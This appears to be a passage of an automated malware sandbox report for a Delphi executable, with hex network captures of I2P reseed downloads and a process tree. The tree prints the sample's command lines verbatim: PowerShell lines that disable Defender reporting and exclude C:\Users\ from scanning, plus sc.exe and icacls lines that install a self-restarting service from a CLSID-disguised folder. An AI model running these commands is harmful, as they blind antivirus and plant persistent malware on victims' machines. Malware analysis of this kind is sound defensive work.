2025-01-01 17:10:17 UTC	4096	IN	Data Raw: 07 18 31 94 b3 64 e4 17 97 d8 f2 19 19 18 e8 19 9a 9b ea 99 5b ea 19 9a 9a 5b 33 66 da 4a e4 1b 96 7b 5b 9a eb 56 44 ba 19 95 98 54 98 98 94 56 79 e7 15 3b da da 5a b3 14 e4 17 95 d8 b2 1a 5b 9a 59 58 58 33 16 db ea 14 9b 26 87 58 7a 05 05 87 98 f8 e4 86 17 95 84 66 38 e5 25 59 f8 a6 85 79 3b 9b 66 9b a4 5b 04 d4 d5 65 14 fa 15 14 57 65 e7 94 db 5a 33 96 d9 32 1a 59 73 c0 dc c1 12 1c 1c 6a c4 30 85 25 39 b1 a0 d8 96 d1 d9 1a a7 7b 74 f2 0b d2 7d fc 33 8a ca cb 13 3d 2d eb b2 f3 fd f3 72 4c 2b cd 8b d2 2d f3 cc 33 cd 5c 7d ca 1c bd fc 73 53 4d aa 0c bd c3 0c 8b b1 b8 d1 c3 c3 35 3f ca 25 aa 40 37 3d d2 25 25 33 c8 24 d7 b3 b0 2c d4 3b df b1 24 c7 d0 d3 dc b4 38 dd d8 39 33 2f 35 c4 dc dc b5 22 1f e6 46 06 06 1d 88 b3 98 02 82 ac 59 f3 52 4b 3c 53 40 c2 7c Data Ascii: 1d[[3fJ{[VDTVy;Z[YXX3&Xzf8%Yy;f[eWeZ32Ysj0%9{t}3=-rL+-3\}sSM5?%@7=%%3$,;$893/5"FYRK<S@\|
2025-01-01 17:10:17 UTC	4096	IN	Data Raw: 9e c5 41 93 77 ce 48 b7 3b ae 35 75 23 5f e0 d2 35 06 26 b6 17 6a dc 0e 31 72 67 5d ff f0 3b c5 73 c2 a8 3c 7e 79 a5 f5 57 b9 e6 b7 ef 58 b0 c1 31 74 f2 b7 35 13 ee cc 4d e7 15 f2 7a 24 d6 34 c1 e0 ca bf c9 69 0b 8f b2 32 b0 30 b0 33 b0 30 30 30 4e 51 fc 67 f2 8e 85 99 01 0a 58 fd 42 9c 03 8c 18 4a 59 32 f2 8b 4b 6c 79 8c 2d f4 4c 0c f4 2c 4d f4 8c 4c 0d ad 19 33 6d 25 dc 2c 33 1c 43 1d 8b f2 bd 42 0a 2b bc 0c d3 72 dd 8c 4c bd 5c cb 6d 6d ad 59 0a f2 8b 4a 6c 59 8d 2c 2c cd cd ac 19 8b 6d 75 22 4b 7d 8b fc c2 ca 8b 22 83 82 3c 73 0b 8d d3 dc 93 fc 33 83 cc 1c c3 8a 4d 33 8a 52 43 b2 23 cd 02 23 cd 13 1d 1d 83 8a 32 42 6d ad 19 cb 6c 19 8d ac d1 5d e1 c0 92 9c 58 50 6c cb 48 b6 81 1c 30 03 59 82 83 43 8d 18 26 43 cc 63 72 72 b6 c6 e1 3f 1d 8b 8c 64 3f 73 Data Ascii: AwH;5u#_5&j1rg];s<~yWX1t5Mz$4i203000NQgXBJY2Kly-L,ML3m%,3CB+rL\mmYJlY,,mu"K}"<s3M3RC##2Bml]XPlH0YC&Ccrr?d?s
2025-01-01 17:10:17 UTC	4096	IN	Data Raw: 9e 4b 61 00 04 00 00 ff ff 50 4b 07 08 84 85 c3 34 0c 02 00 00 61 03 00 00 50 4b 03 04 14 00 08 08 08 00 55 56 21 5a 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 4e 5a 6d 64 51 33 65 67 67 4c 6d 54 58 70 61 68 57 35 41 36 75 75 67 62 51 65 7e 74 79 57 53 44 39 37 50 70 74 46 79 55 64 31 45 3d 2e 64 61 74 55 54 05 00 01 03 1e 75 67 b2 15 9b 6e ec df 78 f4 ca 91 74 66 b7 9b 39 4b 03 f4 03 44 3f 3d 52 08 74 5d f6 9b 29 2f e4 a8 69 09 c3 1a 8d 2f c9 77 53 4c 1b 27 16 5f bc 7b d5 ea 5d eb f3 ed 33 eb 1e bd e4 7f fe ce 83 b1 ca 81 c9 77 54 1e bf bc a0 d6 b7 0d d5 bb 38 93 ef ff dc 59 c9 2f 27 b3 e6 8e db 3b 63 b3 5d 33 d9 04 ce d9 4f 36 9b 71 cc 9d 95 81 85 81 9d 81 85 81 81 71 8a 62 ad dd 02 16 66 06 28 60 f5 0b 71 0e 30 62 Data Ascii: KaPK4aPKUV!Z;routerInfo-NZmdQ3eggLmTXpahW5A6uugbQe~tyWSD97PptFyUd1E=.datUTugnxtf9KD?=Rt])/i/wSL'_{]3wT8Y/';c]3O6qqbf(`q0b
2025-01-01 17:10:17 UTC	4096	IN	Data Raw: aa d0 dc ea f5 f1 5e 6a cb e6 2f d2 d2 6b 0f 2d 2b df 59 6f f4 29 81 53 27 78 ef de 4b 81 42 17 54 0f bd 5b c3 9d 76 22 92 73 4f cd ff eb 4a 9b 33 ce 73 fc 3d 3b 31 dd 6c cf ef de e8 3a f6 65 4b 33 75 56 5d ad e2 9b f2 c6 5e e6 df 8e bd 8f 1d 38 4c 02 79 af 75 e6 35 19 ff d9 7c 2c 33 24 eb 6a f9 a3 6b aa d6 df 63 36 3b 7c 0d 13 8b 9d b4 38 fe d8 a7 1a 63 ff b3 71 22 87 9a 2e 2a df 7c bd c1 c3 a7 62 55 d7 ce 33 f7 f8 3f b5 98 1e eb 5a 2c de 23 ba 80 99 41 a0 ca f5 83 f5 8b 85 ab b6 bf 29 e3 c9 09 2f e0 7c b9 43 7a 8d 93 47 52 fb 89 7d 72 42 ef 97 e8 1c 6d 0a eb e2 0d 9e f2 9c d7 a6 4f 49 51 9d ad 9d 51 ce b0 41 a3 3b fa fa ce 48 a3 62 b1 15 ff f5 58 19 58 18 d8 19 58 18 18 18 a7 28 4e 4c aa 60 62 65 80 02 96 e0 e0 50 23 86 49 2c c9 89 05 c5 b6 8c 4e d6 2c Data Ascii: ^j/k-+Yo)S'xKBT[v"sOJ3s=;1l:eK3uV]^8Lyu5\|,3$jkc6;\|8cq".*\|bU3?Z,#A)/\|CzGR}rBmOIQQA;HbXXX(NL`beP#I,N,
2025-01-01 17:10:17 UTC	4096	IN	Data Raw: 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 6b 6e 41 73 67 68 61 7a 35 55 75 70 59 31 35 44 54 5a 42 47 36 74 50 57 68 7a 6e 48 4a 44 42 70 54 6f 52 4e 4b 5a 4f 2d 76 52 59 3d 2e 64 61 74 55 54 05 00 01 a2 42 75 67 b2 5b f6 d2 a8 ee e7 fa e2 4b 2f 97 86 ca b7 47 cd be da b4 e6 73 e3 7f 0e 49 b6 a6 ce 73 e5 fa 0b 92 ab 3a eb a6 4b cc 75 e4 ff ee ae 29 ba 75 d9 33 11 d9 a5 25 fe c9 31 37 e3 f7 fd db ba e7 4f 8a b1 d5 a8 3c 7e f9 b5 73 35 17 b1 a6 bb 5d c8 3e b0 e9 ce 43 bf ca 0d e7 a6 25 f6 8a 3f 97 4c fe 57 ea a6 a4 ed b4 41 80 95 81 85 81 9d 81 85 81 81 71 8a 12 8f e7 5a 26 66 06 28 60 f5 0b 71 0e 30 62 28 67 c9 c8 2f 2e b1 e5 b3 34 d6 33 34 35 d7 33 32 b1 d0 33 b4 30 b3 66 cc b4 95 08 c9 f7 f7 4d b6 2c 32 49 0b cb ca 4a 2a cc b5 Data Ascii: ;routerInfo-knAsghaz5UupY15DTZBG6tPWhznHJDBpToRNKZO-vRY=.datUTBug[K/GsIs:Ku)u3%17O<~s5]>C%?LWAqZ&f(`q0b(g/.43453230fM,2IJ*
2025-01-01 17:10:17 UTC	4096	IN	Data Raw: 49 50 72 50 72 47 7e 77 55 32 77 6e 41 57 35 4c 4e 32 30 75 46 76 45 75 6f 30 74 67 58 6b 66 50 56 34 57 5a 75 52 32 71 73 3d 2e 64 61 74 55 54 05 00 01 f0 3f 75 67 f2 a8 d7 14 3a f2 77 e9 c1 1f c7 6e 86 b0 8a e8 86 dd fd ce 5a 7f 27 2c 40 75 59 d5 2f ae 74 8e ad c9 f9 df bf 48 3f b8 11 7c d1 9c e7 e9 75 f9 95 d6 46 1a d9 5b d7 b9 1f fa 7d a9 e1 f5 fd 84 c5 47 6d 78 47 e5 f1 cb 2f 09 ed ee ee 5a ed 7d f7 93 d4 e6 2c 55 df 13 3b fc de b2 d5 f8 6b ba 68 ce 2b 09 3d ed 5f f7 b3 92 95 81 85 81 9d 81 85 81 81 71 8a 12 e3 21 61 26 66 06 28 60 f5 0b 71 0e 30 62 a8 60 c9 c8 2f 2e b1 e5 37 b4 b0 d0 33 32 34 d2 33 04 61 13 43 6b c6 4c 5b 09 ef 50 dd 80 4c b7 b0 e0 f0 cc 32 27 d7 30 b3 44 cb aa 80 bc b4 72 5b 5b 6b 96 82 fc a2 12 5b 56 23 33 63 03 53 6b c6 62 5b 9d Data Ascii: IPrPrG~wU2wnAW5LN20uFvEuo0tgXkfPV4WZuR2qs=.datUT?ug:wnZ',@uY/tH?\|uF[}GmxG/Z},U;kh+=_q!a&f(`q0b`/.73243aCkL[PL2'0Dr[[k[V#3cSkb[
2025-01-01 17:10:17 UTC	4096	IN	Data Raw: 38 41 76 4d 52 47 6f 32 69 70 38 68 32 75 37 4e 37 67 69 6c 5a 71 52 36 6f 56 6c 34 73 68 31 67 3d 2e 64 61 74 55 54 05 00 01 1d 28 75 67 5a b1 ab 47 b4 ff 43 26 e7 ae 15 9f b8 82 b7 15 69 6d cd 5e 28 b9 9c ff d6 8e 8b 4b 2a 7f 9a 1b 06 a9 5a ff d3 4a 73 ee 6f ed eb 3e 12 7c b0 ef 42 66 ff 5b d9 60 51 d3 65 3e d7 bb c3 b9 18 96 2b ad f2 1b 95 c7 2f af 20 20 ee 19 b6 5c 5a 35 32 55 a5 cf 91 91 6b c5 e1 1b 69 12 aa 1c 32 fc 95 0f 37 4d 4f ea 7b e2 c1 ca c0 c2 c0 ce c0 c2 c0 c0 38 45 71 c9 e6 53 4c cc 0c 50 c0 ea 17 e2 1c 60 c4 50 c6 92 91 5f 5c 62 cb 6b 61 a8 67 68 66 a1 67 61 ac 67 64 60 68 cd 98 69 2b 11 56 98 16 e9 69 ea 56 95 94 99 a7 9b 62 56 e6 e2 e4 97 99 1b e1 68 6b 6b cd 52 90 5f 54 62 cb 6a 68 61 64 69 60 cd 58 6c ab e3 e1 6a 5e 18 65 10 1c 15 e5 Data Ascii: 8AvMRGo2ip8h2u7N7gilZqR6oVl4sh1g=.datUT(ugZGC&im^(K*ZJso>\|Bf[`Qe>+/ \Z52Uki27MO{8EqSLP`P_\bkaghfgagd`hi+ViVbVhkkR_Tbjhadi`Xlj^e

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49973	80.74.145.70	443	6764	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 17:11:29 UTC	106	OUT	GET https://reseed.diva.exchange:443/i2pseeds.su3 HTTP/1.0 User-Agent: Wget/1.11.4 Connection: close
2025-01-01 17:11:29 UTC	406	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 01 Jan 2025 17:11:29 GMT Content-Type: application/octet-stream Content-Length: 70446 Connection: close Content-Disposition: attachment; filename=i2pseeds.su3 Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Onion-Location: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
2025-01-01 17:11:29 UTC	15978	IN	Data Raw: 49 32 50 73 75 33 00 00 00 06 02 00 00 10 00 14 00 00 00 00 00 01 10 e2 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 31 37 33 35 37 32 39 39 39 33 00 00 00 00 00 00 72 65 73 65 65 64 40 64 69 76 61 2e 65 78 63 68 61 6e 67 65 50 4b 03 04 14 00 08 08 08 00 28 59 21 5a 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 4f 4a 51 4a 76 49 34 59 32 6d 6c 76 58 70 78 78 78 56 51 37 30 6d 5a 73 7e 70 41 7e 75 39 4e 35 72 2d 49 37 4f 68 4d 66 77 62 38 3d 2e 64 61 74 55 54 05 00 01 5c 22 75 67 fa 1d f4 c7 94 85 f1 ab fc b5 d8 0f 3b 53 1c 05 2f f1 1c fd f8 71 ef 65 a3 4a ce c5 39 a7 78 4e 2a 1a 72 dc cb 0d f8 2b 1d ce 2e a0 14 1a 2e 33 d7 71 eb ae 9a 1b 5f 0a dc cf 08 31 3d bf bf 93 a5 b3 36 73 54 1e bf bc d2 15 0d f9 94 a8 2b be 67 Data Ascii: I2Psu31735729993reseed@diva.exchangePK(Y!Z;routerInfo-OJQJvI4Y2mlvXpxxxVQ70mZs~pA~u9N5r-I7OhMfwb8=.datUT\"ug;S/qeJ9xN*r+..3q_1=6sT+g
2025-01-01 17:11:29 UTC	16384	IN	Data Raw: 81 85 81 81 71 8a 62 d5 b2 5f 4c cc 0c 50 c0 ea 17 e2 1c 60 c4 50 ce 92 91 5f 5c 62 cb 67 68 64 a0 67 64 a6 67 64 68 a1 67 68 6c 62 cd 98 69 2b 91 1e 58 9c 66 9a 65 e9 19 e2 57 64 ea 1a 6c 64 59 55 61 92 96 14 68 6b 6b cd 52 90 5f 54 62 cb 6a 68 68 61 6a 66 cd 58 6c ab e3 16 50 91 e9 e8 94 6a 5a e4 51 a5 5b ea 1c 65 52 68 ee 57 55 51 e1 98 12 18 e0 64 5a e2 93 e7 5f 66 58 55 96 e9 ec 5b 6e 19 6a 61 6b cd 58 66 cb 68 64 cd 01 73 07 4b 70 70 a8 11 c3 54 96 e4 c4 82 62 5b 26 27 67 6b 9c 0e d2 09 b1 0c f6 75 f2 f5 f3 f5 f6 0a 29 4b 35 4a 77 f1 30 8f 30 0a 2b 70 b6 08 0e 33 72 34 8e 70 2c 89 32 0e b2 0c af f0 32 0f 8a 0c c5 e2 c8 2c 8b 08 e3 64 23 8b 2c af 34 5f 7f 03 93 e0 aa ba 74 f7 0c c7 54 13 cf 90 ec d4 d2 b0 02 dd 7c cb 80 b2 cc b0 14 c3 08 b7 74 03 98 Data Ascii: qb_LP`P_\bghdgdgdhghlbi+XfeWdldYUahkkR_TbjhhajfXlPjZQ[eRhWUQdZ_fXU[njakXfhdsKppTb[&'gku)K5Jw00+p3r4p,22,d#,4_tT\|t
2025-01-01 17:11:29 UTC	16384	IN	Data Raw: 3d 25 58 22 1f 65 ea 62 be 5b 51 7d 22 05 46 24 00 a5 a3 7f a9 f1 18 dd a8 0f 5c 12 c0 37 1b 78 eb f5 40 5a 55 4b 90 da 99 e7 2d ac c8 d2 3f 0d 18 e2 dc 5a 62 8a a6 42 12 99 65 d8 2c f4 7b 13 c3 ef c6 79 bf 51 15 0d b7 ea a8 cc 4a b7 97 d7 40 73 38 49 ff cd d0 5e 3e b3 86 6a 4a b5 d9 2f 8e fa c9 dc 78 a2 8f cb 76 2e 9e 02 b1 89 cc 17 e2 51 91 2f b5 b4 35 d1 10 fa ee f5 8e 77 fc a9 e3 82 70 30 f3 7f 6d 13 34 f5 f1 80 21 4b 80 67 39 9e 65 79 5e 98 23 70 80 30 3f 47 f0 06 12 00 9c 23 f6 00 31 dc 1c a1 1b 48 14 b1 b4 68 b6 19 12 ca 27 6a 85 74 02 f6 93 82 53 e4 ca 9a a0 24 e4 12 ab 74 87 13 98 f7 95 c4 d4 8e b1 e3 68 df 58 37 54 d5 25 fb 16 40 42 cd b1 eb b5 b5 b8 b3 91 5c b3 92 69 91 5f af 6c b1 cc 46 d6 0c 8f b0 20 37 50 b4 a3 c8 e6 ca b4 92 b2 0b f6 cc 02 Data Ascii: =%X"eb[Q}"F$\7x@ZUK-?ZbBe,{yQJ@s8I^>jJ/xv.Q/5wp0m4!Kg9ey^#p0?G#1Hh'jtS$thX7T%@B\i_lF 7P
2025-01-01 17:11:29 UTC	16384	IN	Data Raw: 08 72 35 f6 b5 48 73 ca cb 0d 2b 76 ac f3 cb 28 8c 32 4a ae f0 77 f2 f0 34 33 0d 4b c6 e1 c4 42 84 97 49 75 0d 99 0e 60 60 48 81 d8 c9 12 91 16 e4 62 cd 9a 97 5a e2 99 02 92 10 c9 4b 2d 49 49 d2 cb ce cb 2f cf f3 49 4d 2c 4e 0d 4e 2d 29 b6 65 36 31 32 b7 16 42 92 0a ca 2f 2d 49 2d 2a 06 05 83 b9 99 a9 35 5f 11 98 af 57 96 5a 54 9c 99 9f 67 cb 66 a0 67 a9 67 66 6c fd 3c 6d df a5 27 73 15 6f 3c ac 9f 35 a5 7d fd da f7 4a 95 fb dc ac 57 da 85 2e de 7e 6a b2 72 dc b4 a4 b3 3c a7 d3 85 fc 58 5d ce 1e 4f 4a be 6c a8 27 2a 2c b4 da f2 8b 50 eb b2 15 ee ba f1 02 1a 2b 38 00 01 00 00 ff ff 50 4b 07 08 95 46 b7 48 1d 02 00 00 32 04 00 00 50 4b 03 04 14 00 08 08 08 00 87 58 21 5a 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 79 44 Data Ascii: r5Hs+v(2Jw43KBIu``HbZK-II/IM,NN-)e612B/-I-5_WZTgfggfl<m'so<5}JW.~jr<X]OJl',P+8PKFH2PKX!Z;routerInfo-yD
2025-01-01 17:11:29 UTC	5316	IN	Data Raw: 14 00 08 08 08 00 87 58 21 5a a9 9c 88 28 0a 02 00 00 5f 03 00 00 3b 00 09 00 00 00 00 00 00 00 00 00 00 00 b3 6c 00 00 72 6f 75 74 65 72 49 6e 66 6f 2d 62 68 74 77 71 6d 6a 4c 46 7e 36 73 47 61 63 36 51 55 7a 31 6f 43 42 32 70 77 65 76 79 71 33 34 4f 62 38 6d 6c 7e 4c 4a 6d 34 6f 3d 2e 64 61 74 55 54 05 00 01 2e 21 75 67 50 4b 01 02 14 00 14 00 08 00 08 00 c7 58 21 5a ea ac eb 66 df 01 00 00 27 03 00 00 3b 00 09 00 00 00 00 00 00 00 00 00 00 00 2f 6f 00 00 72 6f 75 74 65 72 49 6e 66 6f 2d 71 58 75 39 5a 42 55 4b 4b 57 48 74 45 34 47 34 78 79 74 63 5a 37 6a 72 64 57 73 4f 32 56 6f 72 32 51 43 39 6a 55 61 64 50 72 6f 3d 2e 64 61 74 55 54 05 00 01 a7 21 75 67 50 4b 01 02 14 00 14 00 08 00 08 00 87 58 21 5a f3 56 9c d0 0b 03 00 00 2c 03 00 00 3b 00 09 00 00 Data Ascii: X!Z(_;lrouterInfo-bhtwqmjLF~6sGac6QUz1oCB2pwevyq34Ob8ml~LJm4o=.datUT.!ugPKX!Zf';/orouterInfo-qXu9ZBUKKWHtE4G4xytcZ7jrdWsO2Vor2QC9jUadPro=.datUT!ugPKX!ZV,;

Target ID:	0
Start time:	12:09:54
Start date:	01/01/2025
Path:	C:\Users\user\Desktop\DF2.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\DF2.exe"
Imagebase:	0x400000
File size:	8'630'784 bytes
MD5 hash:	9B41D60958D07CDFD3CBC58FBB56CEA7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	12:09:54
Start date:	01/01/2025
Path:	C:\Users\user\Desktop\DF2.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\DF2.exe
Imagebase:	0x400000
File size:	8'630'784 bytes
MD5 hash:	9B41D60958D07CDFD3CBC58FBB56CEA7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	12:09:58
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\4zy7r31p1gb90h9v8yoiitu76a64kr0m.bat"
Imagebase:	0x7ff621a90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:09:58
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	12:09:58
Start date:	01/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	12:09:58
Start date:	01/01/2025
Path:	C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe"
Imagebase:	0x7ff764cc0000
File size:	98'304 bytes
MD5 hash:	319865D78CC8DF6270E27521B8182BFF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 58%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:10:01
Start date:	01/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	12:10:03
Start date:	01/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	12:10:11
Start date:	01/01/2025
Path:	C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe"
Imagebase:	0x7ff679a50000
File size:	10'669'056 bytes
MD5 hash:	2F829F1CB631D234C54F2E6C6F72EB57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 70%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	12:10:14
Start date:	01/01/2025
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill.exe /F /FI "SERVICES eq RDP-Controller"
Imagebase:	0x7ff6eee10000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	12:10:14
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	12:10:14
Start date:	01/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc.exe stop RDP-Controller
Imagebase:	0x7ff6f2a60000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	12:10:14
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	12:10:14
Start date:	01/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore
Imagebase:	0x7ff6f2a60000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	12:10:14
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	12:10:14
Start date:	01/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc.exe failure RDP-Controller reset= 1 actions= restart/10000
Imagebase:	0x7ff6f2a60000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	12:10:14
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	12:10:14
Start date:	01/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc.exe start RDP-Controller
Imagebase:	0x7ff6f2a60000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	12:10:14
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	12:10:15
Start date:	01/01/2025
Path:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Imagebase:	0x7ff76a900000
File size:	89'088 bytes
MD5 hash:	BB070CFBD23A7BC6F2A0F8F6D167D207
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 70%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	12:10:15
Start date:	01/01/2025
Path:	C:\Windows\System32\icacls.exe
Wow64 process (32bit):	false
Commandline:	icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
Imagebase:	0x7ff70f7d0000
File size:	39'424 bytes
MD5 hash:	48C87E3B3003A2413D6399EA77707F5D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	12:10:15
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	12:10:15
Start date:	01/01/2025
Path:	C:\Windows\System32\icacls.exe
Wow64 process (32bit):	false
Commandline:	icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\npX5adYEH7eu.acl
Imagebase:	0x7ff70f7d0000
File size:	39'424 bytes
MD5 hash:	48C87E3B3003A2413D6399EA77707F5D
Has elevated privileges:	true
